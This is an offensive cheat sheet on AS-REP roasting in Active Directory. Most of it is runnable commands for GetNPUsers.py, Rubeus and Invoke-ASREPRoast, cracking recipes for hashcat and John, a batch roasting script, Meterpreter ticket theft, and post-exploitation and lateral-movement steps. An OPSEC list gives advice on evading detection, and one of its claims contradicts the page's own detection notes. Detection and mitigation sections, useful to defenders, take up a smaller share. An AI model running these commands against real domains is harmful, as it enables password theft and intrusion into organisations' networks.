AS-REP Roasting
AS-REP roasting targets accounts that have Kerberos pre-authentication disabled. Because the KDC does not demand proof of the password first, anyone who can reach it can request an AS-REP for such an account; part of that reply is encrypted with a key derived from the account's password, so it can be taken offline and cracked without ever sending a credential.
Vulnerability Overview
- Target: Users with "Do not require Kerberos pre-authentication" enabled (the DONT_REQ_PREAUTH flag in userAccountControl)
- Impact: Offline password cracking of domain user accounts
- Requirements: Network access to a DC and a list of usernames to try (or domain credentials to enumerate them over LDAP)
- Mitigation: Enable pre-authentication (the default in modern Windows; the flag is only set per account, usually for legacy clients)
User Enumeration
Finding AS-REP Roastable Users
```bash
# Impacket - GetNPUsers.py (unauthenticated: needs a usernames file; -no-pass skips the password prompt)
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -usersfile users.txt -no-pass -format john
# Rubeus (from a domain-joined host; it queries LDAP for DONT_REQ_PREAUTH accounts itself)
Rubeus.exe asreproast /format:john /outfile:hashes.txt
# AD enumeration: userAccountControl bit 0x400000 (4194304) = DONT_REQ_PREAUTH, tested with the
# LDAP_MATCHING_RULE_BIT_AND OID. -x is a simple bind and DCs normally reject anonymous reads,
# so add -D user@domain.local -W to bind as a domain user; use -b "DC=domain,DC=local" to cover
# every OU rather than only the default Users container
ldapsearch -x -H ldap://192.168.1.100 \
  -b "CN=Users,DC=domain,DC=local" \
  "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \
  sAMAccountName
```
Attacking AS-REP Roastable Users
Impacket (GetNPUsers.py)
Enumerate Domain
```bash
# List AS-REP roastable users over LDAP (this form needs domain credentials, DOMAIN.LOCAL/user:password;
# add -request to also fetch their AS-REP hashes)
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/
# Unauthenticated: try every name in the users file (no credentials needed)
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -usersfile users.txt
# Format for hashcat ($krb5asrep$23$user@REALM:... layout)
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format hashcat DOMAIN.LOCAL/ -usersfile users.txt -outfile hashes.txt
# Format for John ($krb5asrep$user@REALM:... layout)
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format john DOMAIN.LOCAL/ -usersfile users.txt -outfile hashes.txt
```
Output Format
```bash
# Output: one AS-REP hash per line, ready for cracking
$krb5asrep$23$user@DOMAIN.LOCAL:hash_data
# The whole line is the hash: the $krb5asrep$23$user@REALM prefix tells the cracker the hash type,
# the etype and the account, so feed hashes.txt to the cracker unchanged. To list only the
# roasted accounts:
cut -d'$' -f4 hashes.txt | cut -d':' -f1 > accounts.txt
```
Rubeus (C# Tool)
```powershell
# Basic AS-REP roasting (finds DONT_REQ_PREAUTH accounts over LDAP, then requests an AS-REP for each)
Rubeus.exe asreproast /format:john /outfile:hashes.txt
# Target a specific user (one /user per run)
Rubeus.exe asreproast /user:user1 /format:john
# Specify DC
Rubeus.exe asreproast /dc:192.168.1.100 /format:john
# Roast and crack immediately (-m 18200 needs the hashcat layout; && requires PowerShell 7+ or cmd.exe)
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt && hashcat -m 18200 hashes.txt wordlist.txt
# /nowrap prints each hash on a single line instead of wrapping it across the console
# (wrapped hashes break copy/paste); it does not silence output
Rubeus.exe asreproast /format:john /outfile:hashes.txt /nowrap
```
PowerShell (Invoke-ASREPRoast)
```powershell
# Using Invoke-ASREPRoast from ASREPRoast.ps1 (same author as PowerView; PowerView itself only
# lists such accounts with Get-DomainUser -PreauthNotRequired)
Invoke-ASREPRoast -Outputfile roasted.txt
# Specify target domain
Invoke-ASREPRoast -Domain DOMAIN.LOCAL -Outputfile roasted.txt
# Format for hashcat
Invoke-ASREPRoast -Domain DOMAIN.LOCAL -Format Hashcat -Outputfile hashes.txt
```
Credential Cracking
Hashcat
```bash
# Identify hash mode
# -m 18200 = Kerberos 5, etype 23, AS-REP (RC4); this is the mode for $krb5asrep$23$ lines
# 19700 and 19800 are not AS-REP modes (they are etype 18 TGS-REP and etype 17 pre-auth);
# AES AS-REPs (etype 17/18) need the newer dedicated modes: hashcat --help | grep -i 'AS-REP'
# Dictionary attack
hashcat -m 18200 hashes.txt wordlist.txt
# Brute force (8 characters of the full charset; impractical beyond short passwords)
hashcat -m 18200 hashes.txt -a 3 ?a?a?a?a?a?a?a?a
# Rule-based attack
hashcat -m 18200 hashes.txt wordlist.txt -r rules/best64.rule
# Mask attack (known password pattern): three lowercase letters followed by four digits
hashcat -m 18200 hashes.txt -a 3 ?l?l?l?d?d?d?d
# Hybrid attack (-a 6: each wordlist entry followed by the mask)
hashcat -m 18200 hashes.txt wordlist.txt -a 6 ?l?a?a?a?d
```
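An added example, not code from the page or from any of the tools above: it parses the cracker line layouts described under Output Format and maps each to the hashcat mode, rejoining hashes that Rubeus wraps over several lines, dropping duplicate accounts, and normalising john-layout lines to the layout -m 18200 expects. The sample output, account names and hex values are constructed.

```python
import re
from typing import Optional

# Line layouts GetNPUsers.py writes for RC4 (etype 23) AS-REPs; the john layout omits the etype:
#   $krb5asrep$23$user@REALM:<32 hex checksum>$<hex ciphertext>   /   $krb5asrep$user@REALM:...
_HASH_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?(?P<user>[^@$:]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$")

def parse_asrep_line(line: str) -> Optional[dict]:
    """One cracker line -> fields, or None if the line is not a well-formed AS-REP hash."""
    m = _HASH_RE.match(line.strip())
    if not m:
        return None
    h = {k: (v.lower() if k in ("checksum", "enc") else v) for k, v in m.groupdict().items()}
    h["etype"] = int(h["etype"] or 23)  # john layout carries no etype; GetNPUsers writes RC4 there
    h["hashcat_mode"] = 18200 if h["etype"] == 23 else None  # None: not RC4, -m 18200 does not apply
    return h

def parse_asrep_output(text: str) -> list[dict]:
    """Hashes from raw tool output: rejoins hashes Rubeus wraps over indented lines
    (what /nowrap avoids) and drops repeated accounts so each is cracked once."""
    lines: list[str] = []
    for raw in text.splitlines():
        s = raw.strip()
        if s.startswith("$krb5asrep$"):
            lines.append(s)
        elif lines and raw[:1].isspace() and re.fullmatch(r"[0-9a-fA-F]+", s):
            lines.append(lines.pop() + s)  # indented hex-only line continues the previous hash
    seen, out = set(), []
    for h in filter(None, map(parse_asrep_line, lines)):
        key = (h["user"].lower(), h["realm"].upper())
        if key not in seen:
            seen.add(key)
            out.append(h)
    return out

def to_hashcat_line(h: dict) -> str:
    """Normalise a parsed (possibly john-layout) hash to the layout -m 18200 expects."""
    return f"$krb5asrep${h['etype']}${h['user']}@{h['realm']}:{h['checksum']}${h['enc']}"

# Constructed sample (not a real capture): a GetNPUsers line twice, a wrapped Rubeus hash, noise
SAMPLE_OUTPUT = """\
$krb5asrep$23$svc_backup@DOMAIN.LOCAL:3d6a8c4f5b2e1a0f9c8d7e6f5a4b3c2d$a1b2c3d4e5f6
[*] AS-REP hash:
      $krb5asrep$jdoe@DOMAIN.LOCAL:0123456789abcdef0123456789abcdef$deadbeef
                                    cafebabe
$krb5asrep$23$svc_backup@DOMAIN.LOCAL:3d6a8c4f5b2e1a0f9c8d7e6f5a4b3c2d$a1b2c3d4e5f6
"""
```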
John the Ripper
```bash
# Dictionary attack (the krb5asrep format takes the GetNPUsers -format john layout)
john --format=krb5asrep hashes.txt --wordlist=wordlist.txt
# Incremental mode (brute force)
john --format=krb5asrep hashes.txt --incremental
# Show cracked passwords (pass the same --format so the pot file entries are matched)
john --show --format=krb5asrep hashes.txt
# Wordlist with rules
john --format=krb5asrep hashes.txt --wordlist=wordlist.txt --rules
```
Large-Scale Attacks
Batch AS-REP Roasting
```bash
#!/bin/bash
# Enumerate all domain users and roast each one (unauthenticated: one AS-REQ per name)
# Get all users, one sAMAccountName per line. GetADUser_List.py stands for whatever produced
# the list; GetNPUsers -usersfile does this same loop in a single process
GetADUser_List.py > users.txt
# Roast all: hashcat layout so -m 18200 accepts the lines; keep only hash lines (the banner
# goes to stdout, log messages to stderr)
while IFS= read -r user; do
  [ -n "$user" ] && python3 GetNPUsers.py -dc-ip 192.168.1.100 "DOMAIN.LOCAL/$user" -no-pass -format hashcat 2>/dev/null
done < users.txt | grep '^\$krb5asrep\$' | tee all_hashes.txt
# Crack
hashcat -m 18200 all_hashes.txt wordlist.txt -o cracked.txt
```
Distributed Cracking
```bash
# Split hashes for distributed cracking
split -n l/4 hashes.txt hashes_chunk_
# Worker 1-4 crack their portion
hashcat -m 18200 hashes_chunk_aa wordlist.txt -o results_1.txt
hashcat -m 18200 hashes_chunk_ab wordlist.txt -o results_2.txt
# ... etc
# Combine results
cat results_*.txt > cracked_final.txt
```
Advanced Exploitation
Ticket Theft from a Compromised Host (related technique, not AS-REP roasting)
```bash
# Meterpreter approach: this is pass-the-ticket with tickets stolen from a compromised
# machine; it needs code execution on that host rather than an account without pre-auth
# 1. Obtain shell on domain-joined machine
# 2. Load kiwi module
meterpreter > load kiwi
# 3. Dump TGT (check "help kiwi" for the exact ticket list/export command names in your
#    Metasploit version)
meterpreter > kerberos_ticket_dump
# 4. Pass-the-Ticket
meterpreter > kerberos_ticket_use base64_ticket
```
Combining with Other Attacks
```bash
# Chain AS-REP with Kerberoasting
# 1. Crack an AS-REP hash to recover that account's password
# 2. Authenticate as it to request service tickets (any domain account can)
# 3. Crack the service ticket hashes
# (this form needs -usersfile or domain credentials, as in the enumeration section)
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ -format hashcat -outfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt -o asrep_cracked.txt
# 4. Kerberoast with the cracked credentials (Rubeus takes alternate credentials via
#    /creduser and /credpassword; /user would instead select which SPN account to target)
Rubeus.exe kerberoast /creduser:DOMAIN.LOCAL\cracked_user /credpassword:cracked_password
```
Detection and Mitigation
Detection
```powershell
# AS-REP roasting of a no-preauth account is a successful 4768 (TGT requested) whose
# Pre-Authentication Type is 0; normal logons show 2, and etype 0x17 (RC4) is the cheaply crackable case
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768} | ForEach-Object { $d=@{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name]=$_.'#text' }; if ($d.PreAuthType -eq '0' -and $d.Status -eq '0x0') { [pscustomobject]@{Time=$_.TimeCreated; User=$d.TargetUserName; Source=$d.IpAddress; EType=$d.TicketEncryptionType} } }
# 4771 (pre-auth failed) is never produced by roasting a no-preauth account; bursts of 4771 per
# account point to password guessing instead. Group by the target account, not by ActivityID
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4771} -MaxEvents 1000 | ForEach-Object { (([xml]$_.ToXml()).Event.EventData.Data | Where-Object Name -eq 'TargetUserName').'#text' } | Group-Object | Where-Object Count -gt 10
```
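The same 4768 logic as an added example in Python, not code from the page, for the case where Security events are exported as XML (the ToXml() shape) and analysed offline: it flags TGT requests issued with no pre-authentication and groups them by source address, since one source pulling AS-REPs for several no-preauth accounts is the pattern the tools above produce. The event records, account names and addresses are constructed; the field names are the standard 4768 EventData names.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def parse_event(xml_text: str) -> dict:
    """Flatten one Security event (the XML Get-WinEvent's ToXml() returns) into a dict."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": root.findtext("e:System/e:EventID", namespaces=NS)}
    for d in root.findall("e:EventData/e:Data", NS):
        ev[d.get("Name")] = (d.text or "").strip()
    return ev

def is_asrep_roast_signal(ev: dict) -> bool:
    """A TGT was issued (4768, Status 0x0) with no pre-authentication at all
    (PreAuthType 0). Normal logons show PreAuthType 2 (encrypted timestamp) or the
    PKINIT types; machine accounts (trailing $) always pre-authenticate."""
    return (ev.get("EventID") == "4768"
            and ev.get("Status", "").lower() == "0x0"
            and ev.get("PreAuthType") == "0"
            and not ev.get("TargetUserName", "").endswith("$"))

def summarize_roasting(events: list[dict], min_accounts: int = 2) -> dict:
    """Group roast signals by source IP: one source pulling AS-REPs for several
    no-preauth accounts is the GetNPUsers/Rubeus pattern. RC4 (0x17) replies are
    what -m 18200 cracks; AES replies are slower to crack but still roastable."""
    by_src = defaultdict(lambda: {"accounts": set(), "rc4": 0})
    for ev in events:
        if is_asrep_roast_signal(ev):
            src = ev.get("IpAddress", "?").replace("::ffff:", "")
            by_src[src]["accounts"].add(ev["TargetUserName"])
            by_src[src]["rc4"] += 1 if ev.get("TicketEncryptionType", "").lower() == "0x17" else 0
    return {src: {"accounts": sorted(v["accounts"]), "rc4_tickets": v["rc4"],
                  "alert": len(v["accounts"]) >= min_accounts} for src, v in by_src.items()}

def _ev(user, ip, preauth, etype, status="0x0"):
    # Constructed 4768 record in the shape ToXml() produces (not a real log entry).
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4768</EventID></System><EventData>'
            f'<Data Name="TargetUserName">{user}</Data><Data Name="IpAddress">::ffff:{ip}</Data>'
            f'<Data Name="Status">{status}</Data><Data Name="PreAuthType">{preauth}</Data>'
            f'<Data Name="TicketEncryptionType">{etype}</Data></EventData></Event>')

SAMPLE_EVENTS = [parse_event(x) for x in (
    _ev("jdoe", "10.0.0.20", "2", "0x12"),                # normal logon, timestamp pre-auth
    _ev("WKS01$", "10.0.0.20", "2", "0x12"),              # machine account
    _ev("svc_backup", "10.0.0.5", "0", "0x17"),           # no pre-auth, RC4: roastable
    _ev("svc_sql", "10.0.0.5", "0", "0x17"),
    _ev("legacy_app", "10.0.0.5", "0", "0x12"),           # no pre-auth, AES: still roastable
    _ev("jdoe", "10.0.0.99", "0", "0xffffffff", "0x19"),  # KDC refused: pre-auth required
)]
```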
Mitigation
```powershell
# Enable pre-authentication on every account that has it disabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADAccountControl -DoesNotRequirePreAuth $false
# Verify pre-auth enabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select-Object SamAccountName
# Should return empty list
# Group Policy setting
# Computer Configuration > Windows Settings > Security Settings > Account Policies > Kerberos Policy
# > Enforce user logon restrictions: Always
# Note: DONT_REQ_PREAUTH is a per-account userAccountControl flag, not a policy setting, and the
# Kerberos Policy entry above does not itself force pre-authentication; the audit query is the
# authoritative check, so re-run it on a schedule because any admin can set the flag again.
# An account that must keep the flag needs a long random password (the only real defence then)
# and AES-only encryption types, which removes the fast-to-crack RC4 reply.
```
Offensive Operations
Pre-Engagement
```bash
# Identify AS-REP roastable accounts (the LDAP query needs domain credentials,
# DOMAIN.LOCAL/user:password; without them use -usersfile as in the enumeration section)
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/ 2>/dev/null | tee asrep_targets.txt
# Count potential targets
wc -l asrep_targets.txt
```
Execution
```bash
# Extract all AS-REP hashes (with credentials add -request; without them use -usersfile)
python3 GetNPUsers.py -dc-ip 192.168.1.100 -format hashcat DOMAIN.LOCAL/ -outfile asrep_hashes.txt
# Transfer to cracking machine
# ... network transfer ...
# Crack hashes
hashcat -m 18200 asrep_hashes.txt wordlist.txt -o cracked.txt --logfile crack.log
# Monitor progress
watch tail crack.log
```
Post-Exploitation
```bash
# Use cracked passwords for lateral movement
# Test credentials
python3 GetNPUsers.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password
# If successful, credential is valid
# Use for:
# - PSExec lateral movement
# - WMI execution
# - RDP access
# - Additional enumeration
```
Tools Comparison
| Tool | Language | Features | Advantages |
|---|---|---|---|
| GetNPUsers.py | Python | Enumeration, extraction | Fast, flexible output |
| Rubeus | C# | Multi-format output | Single executable, no dependencies |
| Invoke-ASREPRoast | PowerShell | Domain enumeration | Native Windows, stealthy |
OPSEC Considerations
- AS-REP roasting generates authentication traffic
- Multiple failed pre-auth attempts appear in logs
- Use legitimate tools (Rubeus) to blend with normal admin tools
- Schedule roasting during business hours
- Limit scope to specific OUs/user groups
- Monitor for detection (alerts may fire before successful crack)
Wordlists and Rules
```bash
# Best wordlists for domain password cracking
# - rockyou.txt (most common)
# - seclists/Passwords/Common-Credentials
# - Jumbo John password lists
# Rules increase success rate 10-30%
# - OneRule (massive rule set)
# - best64.rule (balanced)
# - d3ad0ne.rule (targeted rules)
# Generate custom rules. Quote the heredoc delimiter: $2$0$2$3 must reach the file literally,
# and an unquoted heredoc would expand $0 and $2 as shell parameters. Each line is an
# independent rule; put functions on one line to apply them together
cat > custom.rule << 'EOF'
# Capitalize first letter, lowercase the rest
c
# Append year
$2$0$2$3
# Both at once
c $2$0$2$3
EOF
hashcat -m 18200 hashes.txt wordlist.txt -r custom.rule
```
Troubleshooting
```bash
# Hash extraction fails
# Verify DC IP: ping 192.168.1.100
# Check name resolution against the DC: nslookup DOMAIN.LOCAL 192.168.1.100
# Hashcat recognizes wrong hash type
# Check the prefix: head hashes.txt | cut -d'$' -f1-3   (expect $krb5asrep$23 for -m 18200)
# Compare to hashcat's reference layout: hashcat --example-hashes -m 18200
# Cracking too slow
# List devices: hashcat -I; restrict to GPUs with -D 2 (device types: 1 CPU, 2 GPU) or pick one with -d <id>
# Optimized kernels: -O (limits candidate length, fine for typical wordlists)
# Reduce hash count: run the fast dictionary pass first and drop cracked hashes with --remove
# before slower rule and mask passes
# Hash format errors
# Validate format: john --list=formats | grep krb5
# Layout mismatch: GetNPUsers -format hashcat writes $krb5asrep$23$user@REALM:..., -format john
# writes $krb5asrep$user@REALM:...; re-run extraction with the layout your cracker expects
# rather than hand-editing lines
```